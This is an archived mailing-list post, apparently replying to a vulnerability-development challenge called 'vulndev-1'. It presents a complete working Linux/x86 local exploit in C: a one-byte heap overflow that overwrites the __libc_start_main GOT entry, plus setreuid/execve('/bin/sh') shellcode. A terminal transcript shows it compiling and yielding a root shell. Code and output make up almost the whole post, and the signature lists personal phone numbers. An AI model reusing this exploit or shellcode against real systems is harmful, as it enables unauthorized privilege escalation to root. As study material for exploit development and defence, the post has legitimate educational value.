Dear Vulnerability Developers, Thanks to your remarkably insightful analysis of this utterly complex bug. Heh. Anyway, here's what I come up with. Analyze this! ;-) PS. Greets to Doug Lee! [je@vudo ~]$ ADDR=`objdump -R vulndev-1 | awk '$3 == "__libc_start_main" { print $1 }' [je@vudo ~]$ echo $ADDR 08049610 [je@vudo ~]$ cat<<EOF>expldev-1.c /* * Exploit (Linux/x86) for vulndev-1. * * 2003-05-13 - Joel Eriksson (je at 0xbadc0ded.org) */ #include <stdlib.h> #include <string.h> #include <unistd.h> #include <stdio.h> char code[] = "\xeb\x0e" "AAAAAAAAAAAAAA" /* jmp 0x0e ; unlink() is evil. */ \ /* setreuid(0,0) */ \ "\x31\xc0" /* xor %eax,%eax */ \ "\x31\xdb" /* xor %ebx,%ebx */ \ "\x31\xc9" /* xor %ecx,%ecx */ \ "\xb0\x46" /* mov $0x46,%al */ \ "\xcd\x80" /* int $0x80 */ \ /* execve("/bin/sh", "/bin/sh", NULL) */ \ "\x31\xd2" /* xorl %edx,%edx */ \ "\x52" /* pushl %edx */ \ "\x68\x6e\x2f\x73\x68" /* pushl $0x68732f6e */ \ "\x68\x2f\x2f\x62\x69" /* pushl $0x69622f2f */ \ "\x89\xe3" /* movl %esp,%ebx */ \ "\x52" /* pushl %edx */ \ "\x53" /* pushl %ebx */ \ "\x89\xe1" /* movl %esp,%ecx */ \ "\x8d\x42\x0b" /* leal 0xb(%edx),%eax */ \ "\xcd\x80"; /* int $0x80 */ #define DEF_PROG "./vulndev-1" #define DEF_ADDR $ADDR /* __libc_start_main GOT-jumpslot */ #define BUF_SIZE 252 #define BOF_SIZE 1 int main(int argc, char **argv) { unsigned int code_addr = 0xc0000000 - 4, dest_addr = DEF_ADDR; char *envp[] = { code, NULL }; char *prog = DEF_PROG; char arg1[BUF_SIZE+BOF_SIZE+1]; char arg2[9]; if (argc >= 2) prog = argv[1]; if (argc >= 3) dest_addr = strtoul(argv[2], NULL, 16); memset(arg1, 'A', BUF_SIZE+BOF_SIZE); arg1[sizeof(arg1)-1] = '\0'; code_addr -= strlen(prog) + 1; code_addr -= strlen(code) + 1; *((unsigned int *) &arg2[0]) = code_addr; *((unsigned int *) &arg2[4]) = dest_addr; fprintf(stderr, "0x%08x\n", code_addr); execle(prog, prog, arg1, arg2, NULL, envp); perror("exec"); return 1; } EOF [je@vudo ~]$ gcc -o expldev-1 expldev-1.c [je@vudo ~]$ ./expldev-1 0xbfffffbd 
sh-2.05b# whoami root sh-2.05b# -- Joel Eriksson <jeat_private> ------------------------------------------------- Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37 Security Research & Systems Development at Bitnux PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1 A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1 -------------------------------------------------